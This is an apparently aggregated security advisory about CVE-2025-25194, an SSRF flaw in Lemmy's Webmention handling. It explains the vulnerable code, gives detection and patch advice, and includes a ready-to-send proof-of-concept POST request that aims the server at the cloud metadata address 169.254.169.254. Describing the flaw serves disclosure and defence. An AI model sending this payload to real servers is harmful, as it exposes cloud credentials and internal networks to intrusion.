Lemmy, Server-Side Request Forgery (SSRF), CVE-2025-25194 (Medium)

Listen to this Post

The vulnerability arises because Lemmy does not sufficiently validate user‑supplied URLs before using them in server‑side HTTP requests. Specifically, an authenticated (low‑privileged) user can create a link post to a public community via the `POST /api/v3/post` endpoint. The `url` field is accepted, normalized with diesel_url_create(), and only validated with is_valid_url(). This validation checks for allowed schemes (http, https, magnet) but does not reject loopback, private, or link‑local addresses.
After the post is created, the backend asynchronously schedules a Webmention to be sent to the attacker‑controlled URL (as shown in crates/api_crud/src/post/create.rs). The vulnerable code path is:

if community.visibility == CommunityVisibility::Public {
let url = url.clone();
spawn_try_task(async move {
if let Some(url) = url {
Webmention::new(post.ap_id.clone().into(), url.into()).send().await?;
}
Ok(())
});
}

Because no internal‑address filtering occurs before the Webmention request is issued, a normal user can trigger server‑side HTTP requests toward internal services (e.g., http://127.0.0.1:8081/`). The attack is blind – the response from the internal target is not returned to the attacker – but the request is still made by the Lemmy server, enabling internal port scanning, interaction with internal webhooks, or access to cloud metadata endpoints.
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: Lemmy
Version: ≤0.19.8
Vulnerability : SSRF via Webmention
Severity: Medium
Date: 2025‑02‑10
<h2 style="color: blue;">Prediction: Expected patch by 2025‑03‑15</h2>
<h2 style="color: blue;">Analytics – What Undercode Say</h2>
The vulnerability can be detected by monitoring outbound HTTP requests from the Lemmy server. Unexpected requests to loopback, private, or link‑local addresses indicate possible exploitation. The following Bash command can be used to watch for suspicious outbound connections:

sudo tcpdump -i any -n 'dst host 127.0.0.1 or dst net 10.0.0.0/8 or dst net 172.16.0.0/12 or dst net 192.168.0.0/16'

Additionally, the presence of `url` parameters containing internal IP addresses in the Lemmy API logs (e.g.,/api/v3/post) is a strong indicator.
<h2 style="color: blue;">Exploit</h2>
<h2 style="color: blue;">A complete Proof‑of‑Concept (PoC) is:</h2>

POST /api/v3/post HTTP/1.1
Host: victim.example
Authorization: Bearer <low‑priv‑jwt>
Content-Type: application/json
{
"name": "wm-ssrf",
"community_id": 1,
"url": "http://169.254.169.254/latest/meta-data/",
"body": null,
"alt_text": null,
"honeypot": null,
"nsfw": false,
"language_id": null,
"custom_thumbnail": null
}

The attacker first sets up an HTTP listener on a target internal address (e.g.,http://127.0.0.1:8081/`). After sending the crafted POST request, the Lemmy server will asynchronously issue a GET request to that internal target, confirming the SSRF.

Protection from this CVE

  • Update Lemmy: Upgrade to a version that includes the fix (e.g., commit `7773a67` where internal‑address filtering is added).
  • Outbound allow‑list: Configure the Lemmy server’s egress firewall to permit only connections to public IP ranges and block all requests to loopback, private, and link‑local addresses.
  • Webmention filtering: Modify the Webmention sending routine to reject any URL that resolves to an internal IP address before initiating the request.
  • API‑side validation: Enforce rigorous URL validation on the `url` parameter inside `create_post` to reject internal destinations.

Impact

  • Internal network discovery: An attacker can probe internal services, map open ports, and identify reachable endpoints.
  • Access to cloud metadata: On cloud‑hosted instances, the attacker can retrieve IAM roles, user data, and other sensitive metadata (e.g., via `http://169.254.169.254/`).
  • Internal webhook abuse: The blind SSRF can trigger internal webhooks, administrative actions, or interact with unauthenticated internal APIs.
  • Escalation potential: Combined with other vulnerabilities (e.g., internal service RCE), the SSRF can serve as a stepping stone for deeper compromise of the infrastructure.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top